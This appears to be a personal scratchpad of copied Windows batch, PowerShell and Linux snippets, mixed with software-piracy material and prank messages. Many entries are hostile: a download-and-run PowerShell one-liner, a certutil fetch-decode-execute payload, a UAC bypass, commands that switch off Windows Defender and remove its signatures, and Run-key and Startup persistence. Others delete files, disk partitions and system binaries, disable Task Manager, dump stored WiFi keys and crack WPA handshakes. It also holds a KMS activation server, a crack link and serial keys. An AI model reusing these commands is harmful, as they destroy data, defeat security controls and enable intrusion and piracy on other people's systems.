Random code I just copy paste out

###################################################################################################################################

Cloudflare DNS

1.1.1.1
1.0.0.1
2606:4700:4700::1111
2606:4700:4700::1001

###################################################################################################################################

slmgr /ipk "xxx"

Home/Core                            TX9XD-98N7V-6WMQ6-BX7FG-H8Q99        
Home/Core (Country Specific)         PVMJN-6DFY6-9CCP6-7BKTT-D3WVR  
Home/Core (Single Language)          7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH  
Home/Core N                          3KHY7-WNT83-DGQKR-F7HPR-844BM 
Professional                         W269N-WFGWX-YVC9B-4J6C9-T83GX 
Professional N                       MH37W-N47XK-V7XM9-C7227-GCQG9 
Enterprise                           NPPR9-FWDCX-D2C8J-H872K-2YT43 
Enterprise N                         DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4 
Education                            NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 
Education N                          2WH4N-8QGBV-H22JP-CT43Q-MDWWJ 
Enterprise 2015 LTSB                 WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Enterprise 2015 LTSB N               2F77B-TNFGY-69QQF-B8YKP-D69TJ 
Enterprise 2016 LTSB                 DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ  
Enterprise 2016 LTSB N               QFFDN-GRT3P-VKWWX-X7T3R-8B639
 
slmgr /skms kms.lotro.cc
slmgr /ato

###################################################################################################################################

set __COMPAT_LAYER=RUNASINVOKER

###################################################################################################################################

Defaults        badpass_message="pass wrong go fuck yourself you son of a bitch!"

###################################################################################################################################

>/dev/null 2>&1

###################################################################################################################################

https://clippingpanda.com/photoshop-cc-2021-crack/
-Photoshop Cracked 2021

###################################################################################################################################

if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit /b)

###################################################################################################################################

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Phoenixthrush/phoenixthrush.github.io/master/cmd.ps1')"
SystemPropertiesAdvanced.exe

###################################################################################################################################

set-executionpolicy remotesigned

###################################################################################################################################

New-ItemProperty "HKCU:\Environment" -Name "windir" -Value "cmd.exe /k cmd.exe" -PropertyType String -Force
schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

###################################################################################################################################

SystemPropertiesAdvanced.exe

###################################################################################################################################

Add-MpPreference -ExclusionPath "C:\Windows\System32"

###################################################################################################################################

mount -o remount,size=2G /run/archiso/cowspace

###################################################################################################################################

$CurrentLocation
$env:SystemRoot\
$env:USERPROFILE

###################################################################################################################################

set /a var=%random% %% 2 + 1

# First num is range second starting number 

###################################################################################################################################

if %asw%==y (goto continue)
if %asw%==n (goto exit) else (goto menue)

###################################################################################################################################

powerShell -NoProfile -NonInteractive -Command [reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.Windows.Forms.MessageBox]::show('reminder: you are gay') >nul

###################################################################################################################################

powershell -noexit -command "[console]::windowwidth=1; [console]::windowheight=1; [console]::bufferwidth=[console]::windowwidth"

###################################################################################################################################

echo hentai = msgbox (^"such dir nen girlfriend du hurensohn^",0, ^"ey bro^") > tmp.vbs

###################################################################################################################################

start /b "" cmd /c del "%~f0" && taskkill /im cmd.exe /f

###################################################################################################################################

:loop
FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq chromeupdater.exe"') DO IF %%x == chromeupdater.exe goto found
timeout 1 >nul
goto loop

:found
timeout 1 >nul
goto loop

###################################################################################################################################

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "update" /t REG_SZ /f /d "%userprofile%\AppData\Roaming\Microsoft\System32\trigger.bat"

###################################################################################################################################

set WshShell = wscript.createobject("WScript.shell")
WshShell.run """.\tmp.bat"" ", 0, true

###################################################################################################################################

dir /s /b > files.txt
get-content files.txt | foreach-object {Remove-Item -recurse -force -exclude files.txt $_}

###################################################################################################################################

Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 1

###################################################################################################################################

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

###################################################################################################################################

Get-MpComputerStatus

# disable scanning all downloaded files and attachments, disable AMSI (reactive)
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true

# disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1 

# exclude a folder
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"

# remove signatures (if Internet connection is present, they will be downloaded again):
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All

###################################################################################################################################

:loop
timeout 60
FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq notepad.exe"') DO IF %%x == notepad.exe goto FOUND
goto loop

:FOUND
taskkill /im notepad.exe /f

goto loop

###################################################################################################################################

%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

###################################################################################################################################

Encoder Base64

cd %userprofile%\Desktop
certutil -encode "%~1" tmp.b64 && findstr /v /c:- tmp.b64 > "%~1".b64
del tmp.b64


Decoder Base64

cd %userprofile%\Desktop
certutil -decode "%~1" "%~1".decoded
del "%~1"

###################################################################################################################################

bitsadmin /transfer mydownloadjob /download /priority foreground "https://.rar" "C:\Windows\Temp\.rar"

###################################################################################################################################

Set-MpPreference -DisableRealtimeMonitoring $true

###################################################################################################################################

$SourceFileLocation = “$env:SystemRoot\System32\notepad.exe”
$ShortcutLocation = “$env:USERPROFILE\Desktop\Notepad.lnk”
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutLocation)
$Shortcut.TargetPath = $SourceFileLocation
$Shortcut.Save()


###################################################################################################################################

echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt

diskpart /s y.txt  >nul

###################################################################################################################################

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

###################################################################################################################################

powershell -command "Expand-Archive C:\Windows\Temp\.zip C:\Windows\Temp\"

###################################################################################################################################

wsl --terminate Ubuntu-20.04
wsl --distribution Ubuntu-20.04

###################################################################################################################################

echo question
echo ==========================
echo [1] lol
echo [2] lmao
echo [3] ur
echo [4] so
echo [5] gay
echo.
echo [6] exit

set /p choice="tmp?"
if %menue_choice%==1 goto lol
if %menue_choice%==2 goto lmao
if %menue_choice%==3 goto ur
if %menue_choice%==4 goto so
if %menue_choice%==5 goto gay
if %menue_choice%==6 goto exit

###################################################################################################################################

netsh wlan show profile "Wifi-Name" key=clear

###################################################################################################################################

powershell -command "wmic path softwarelicensingservice get OA3xOriginalProductKey" >> %userprofile%\Desktop\phoenix.txt

###################################################################################################################################

airmon-ng check kill
pkill
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng --bssid ? -c ? --write hash wlan0

aireplay-ng –0 2 –a ? –c ? wlan0
aircrack-ng hash.cap -w /usr/share/wordlists/?

###################################################################################################################################

xcopy %~dp0\tmp.bat %userprofile%\

or

xcopy /s %~dp0\*.* "%programdata%\Microsoft\Windows\Start Menu\Programs\StartUp" >nul

###################################################################################################################################

echo WScript.Sleep 2500 >> x.vbs
echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> x.vbs
echo objFSO.DeleteFile("C:\Windows\system32\cmd.exe") >> x.vbs

###################################################################################################################################

setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set alfanum=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789?!

set pwd=
FOR /L %%b IN (0, 1, 16) DO (
SET /A rnd_num=!RANDOM! * 62 / 32768 + 1
for /F %%c in ('echo %%alfanum:~!rnd_num!^,1%%') do set pwd=!pwd!%%c
)

echo %pwd%

###################################################################################################################################

shutdown.exe /r /t 0

###################################################################################################################################

takeown /f C:\Windows\explorer.exe >nul
icacls "C:\Windows\explorer.exe" /grant Administrator:M >nul
taskkill /im explorer.exe /f >nul
powershell -command "rm C:\Windows\explorer.exe" >nul

###################################################################################################################################

copy /b .jpg + .rar .jpg

###################################################################################################################################

AOMEI Partition Assistant 9.4.1 

Serial keys
SSD6-XQ5G-GQT9-ZUNR-WAH9
C4TD-MAN6-XTSG-ID7J-QLET
XMEG-PROD7-LEVT-VPHS-02F6
License Keys
AW2A-X6WD-URHN-PX4J-QCRU
QWDZ-JVEU-AYE9-MNAD-7FOZ
ASE2-QXTU-JKGK-JUT1-GON4
Activation Keys
RAN6-MIX4-GAND-SIFE-3G6T
KHTM-49KL-PUR3-JAV8-KIN0
JML4-ANE7-A1L0-SAD9-JAM4
Product Key
AKM8-MAS2-CH77-KHI9-ARRI


FILE: cfg.ini

[CONFIG]
COUNT=7
KEY=AOTE-33SP8-E54A6-735MT
[Version]
VERSION=7

###################################################################################################################################

country=US
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
    ssid="NETWORK-NAME"
    psk="NETWORK-PASSWORD"
}

